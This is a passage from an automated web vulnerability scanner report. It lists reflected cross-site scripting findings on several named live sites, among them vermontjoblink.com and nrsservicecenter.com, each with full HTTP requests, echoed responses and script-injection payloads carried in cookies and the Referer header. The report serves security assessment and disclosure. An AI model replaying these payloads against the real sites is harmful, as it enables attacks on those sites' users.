NIST: g3
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 535

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=37ba9--><script>alert(1)</script>c42eb69629a-->
...[SNIP]...

3.178. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f223f"><a>4f2eeafb0f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f223f"><a>4f2eeafb0f7
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:57'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<form action="http://www.google.com/search?hl=en&q=f223f"><a>4f2eeafb0f7&amp;securitysys=on&amp;FormID=480&amp;rand=838597" method="post" style="margin:0px;padding:0px;" name="Form0">
...[SNIP]...

3.179. http://image.providesupport.com/js/hic/safe-standard.js [vsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a17"-alert(1)-"5b90fbcef04 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201820966&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com
Cookie: vsid=Gh9fR1o5MmIq71a17"-alert(1)-"5b90fbcef04

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5012
Date: Sat, 30 Apr 2011 22:18:36 GMT
Connection: close

var psMygbsid = "Gh9fR1o5MmIq71a17"-alert(1)-"5b90fbcef04";
// safe-standard@ie5up.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygbiso = false;
}
if (psMygbiso)
...[SNIP]...

3.180. http://image.providesupport.com/js/hic/safe-textlink.js [vsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad017"-alert(1)-"f1167be7650 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201774170&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com
Cookie: vsid=69Yp4BH4IXZtad017"-alert(1)-"f1167be7650

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 4803
Date: Sat, 30 Apr 2011 22:18:36 GMT
Connection: close

var psNjc9sid = "69Yp4BH4IXZtad017"-alert(1)-"f1167be7650";
// safe-textlink@ie5up.js

var psNjc9iso;
try {
   psNjc9iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psNjc9wid != null);
} catch(e) {
   psNjc9iso = false;
}
if (psNjc9iso)
...[SNIP]...

3.181. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 12693<script>alert(1)</script>9f4e02bdbc1 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Ftn.gov%2F&jsref=&rnd=1304123873055 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==12693<script>alert(1)</script>9f4e02bdbc1; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 30 Apr 2011 00:37:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==12693<script>alert(1)</script>9f4e02bdbc1
userid:
</div>
...[SNIP]...

3.182. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d55"><a>b0cb33d534e was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-901854364d55"><a>b0cb33d534e; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sat, 30 Apr 2011 15:09:04 GMT
Connection: close
Content-Length: 370

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-901854364d55"><a>b0cb33d534e%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22);" width="1" height="1" border="0" />
...[SNIP]...

3.183. https://www.nrsservicecenter.com/iApp/ret/content/landing.do [MyNRSSite cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload 65e4f<script>alert(1)</script>549513791a0 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/content/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio45765e4f<script>alert(1)</script>549513791a0; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:57:51 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=751121AC73291073038DA7AE49DFB6BC; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001Cx8w-04q4fTm7WKclkerRyx:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Set-Cookie: MyNRSSite=Ohio45765e4f<script>alert(1)</script>549513791a0; Expires=Tue, 27 Apr 2021 12:57:54 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3474


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio45765e4f<script>alert(1)</script>549513791a0'

</div>
...[SNIP]...

3.184. https://www.nrsservicecenter.com/iApp/ret/landing.do [MyNRSSite cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload 1e0f9<script>alert(1)</script>f6c9dd828c8 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:54:11 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=F214AD8C732810730F1FDFF10C93643E; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001IjeLiKhlfJ4zQmEz19sNNxM:13j9iupo2; Path=/
Set-Cookie: MyNRSSite=Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8; Expires=Tue, 27 Apr 2021 12:55:15 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3369


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio4571e0f9<script>alert(1)</script>f6c9dd828c8'

</div>
...[SNIP]...

3.185. https://www.nrsservicecenter.com/iApp/ret/showPage.do [MyNRSSite cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The value of the MyNRSSite cookie is copied into the HTML document as plain text between tags. The payload cf001<script>alert(1)</script>db581849878 was submitted in the MyNRSSite cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457cf001<script>alert(1)</script>db581849878; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:54:54 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=0B8DAA0273291073038DB380FF8A8D55; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00012UsdwHUQoqLfeElOyIGVfNj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 3492


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...
<div id="header" role="navigation">
[ServletException in:/WEB-INF/jspf/master/header.jsp] PropertiesTag error for Ohio457cf001<script>alert(1)</script>db581849878'

</div>
...[SNIP]...

3.186. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d9daa"><img src=a onerror=alert(1)>a6ccc200b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=end9daa"><img%20src%3da%20onerror%3dalert(1)>a6ccc200b23; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:21 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end9daa"><img src=a onerror=alert(1)>a6ccc200b23">
...[SNIP]...

3.187. https://www.vermontjoblink.com/ada [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cb2"%3balert(1)//cd290823b76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as c1cb2";alert(1)//cd290823b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enc1cb2"%3balert(1)//cd290823b76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENC1CB2";ALERT(1)//CD290823B76\">
...[SNIP]...

3.188. https://www.vermontjoblink.com/ada/404/404_qry.cfm [SYSTRANLANGUAGE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75aaa"%3balert(1)//0a76fef37a8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 75aaa";alert(1)//0a76fef37a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

